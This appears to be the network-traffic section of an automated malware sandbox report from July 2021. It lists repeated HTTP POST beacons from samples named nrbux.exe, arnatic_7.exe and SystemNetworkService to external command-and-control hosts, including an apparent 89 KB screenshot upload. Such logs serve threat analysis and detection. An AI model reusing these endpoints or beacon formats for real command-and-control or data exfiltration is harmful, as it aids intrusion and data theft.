                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b6efb900001bd52612a000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=NCVVfglB%2FXsQDV2gf4vbebPZvtJg%2BsHMAIwJjPmSOuibsBHlckPVpGFPXvJixYsFiA2RAkqrQYxc6miI%2Bz2X5lotDGlQWHWjXHxmdgpZaZW8cpUFM07eVv8vTbVt1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686275f8a9c1bd5-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:27:54 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----e3f3374ff0b178337b7dde905fb87e17
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 89452
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:27:59 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b717a100004c747cb84000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=hM0SPsZIMQTYVn3HwjxgOAai6UQS9fpp7y6N0URIiaMwzjce0zMv9SOLc5ZZYgt8XG8e03ScvabKVcQgmzaz6UmT6T%2B1S%2BirUYJJbiDsTBYHQVisCKe5iQi9zNLf7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686279f6e914c74-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:28:10 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b73f920000d8d10c2bb000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=LzCKy0xIAMIMCblHtBmJuRjX7hzk9xJT0NHaickKPFf5CdvYtkv%2FZn7b8B3%2BtUnt7Gij%2FSBbVdsSQMyLU5DvMrDGa32NDkxGqf4KDTuQJLSSM0CMSSciBcXF1Ydc4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668627df5f90d8d1-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:28:20 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b767ae0000c779be37d000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=cPl9xdNXS0PpSgiTUCn2TzfPywtlxaEql3%2FS6Pmv9w2Eb%2FHhyqaRx5v%2BQDd3DtmfSux1UteoRVx0mvW%2BRs13qw2CadplwIfOUekGaJkM2bEVdkkmvXU6TDIc2RXwXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686281f782ec779-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:28:30 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b78f480000164988b29000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=UmJ1d9IxXlm7WAydS1Gyg1UVTapbF%2FvMydBdCoJGJa77WZGEjiVReZKks1bZ%2FQohLmc1Zp4EY9YH41hgIbFbZhMkFghi%2BrnVaqGzfsfzaKAtURegpjKKLVC9RCKXtA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686285eda6d1649-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:28:40 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b7b6da00001bbde5090000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=B74JPpGR%2FoMvBvM1ezcSEfgjshnpZbI8kAtIkvMxOJIdiKEZWBTo7yDK37IXxHAeOZMjfQJ3lj7yYB9TOxLcIGegf1gc%2Be%2BfxYjiTYd%2FjtduYvLnkUEQIm1Z9NJ9wg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686289e2d861bbd-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:28:50 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b7de940000d44f7ea02000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=VyWO0NXD5xQRwobl6Za4ryUoJBTJFPk%2BO9vyGVOPtUAU7kJ8vSrcRxvE%2FgZlkJidtgbQhYB52HzBddXUfqO%2FpxyHYENIGHU40aPMDqxfQB275RP%2BAV2uiSRJzuKp7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668628ddba5fd44f-HAM
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:28:54 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:29:01 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b80735000019c77eaf3000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=8Rwzt3kVgUvcUMHrsDuTSiSFMkFDH9DAMJsTkWEQaIHmyrPfM3wsqgoTag10dPCgA06B%2Brmhfi0wlMK6WLCAULn4%2FKbcl1%2Btgr4nuy7udaxqlt3WXUoIhiuyHauuAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686291ebb7219c7-EWR
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:29:12 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b83156000031cd32b0b000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=CilUa4%2FcrvvavyFv6Z3vHw3EUX84eZ59%2BU0TxlRXabIrH8JfL1hyl50ZeNBy7l549kpnS6DI5BFPD4TucLfcD7Fz%2BZx%2FsTmr390uHKlMU3xP%2FN5g6MKq1dqj3EcPng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668629622c7931cd-LAX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:29:22 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b85b490000fdc1b015d000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=i51q3t4iZgIwuGy4T9BCqCbQaNA2X9HZfpiwNYm7ESfw0O8FmdXXSRzEjd5dewvPHrZGtJ8QZf0pgibDoRYTJt%2Bz8iRIUeyXdC2tdyvKJgm2R7M7RiKOi9vQhldXqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
